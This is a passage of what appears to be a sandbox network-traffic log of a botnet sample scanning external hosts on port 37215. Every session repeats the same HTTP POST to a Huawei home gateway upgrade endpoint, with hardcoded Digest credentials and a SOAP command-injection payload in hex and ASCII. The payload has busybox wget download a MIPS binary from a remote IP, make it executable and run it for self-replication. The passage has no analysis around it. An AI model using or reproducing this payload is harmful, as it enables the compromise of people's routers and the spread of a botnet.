                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    109192.168.2.1434588197.186.174.4537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.177650928 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.530155897 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    110192.168.2.1450170157.144.237.12237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.177650928 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.530155897 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    111192.168.2.1449136158.13.46.1837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.178483009 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.559597969 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    112192.168.2.1456852157.144.212.15637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.178483963 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.559597969 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    113192.168.2.1456194157.29.80.9737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.178483963 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.559597969 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
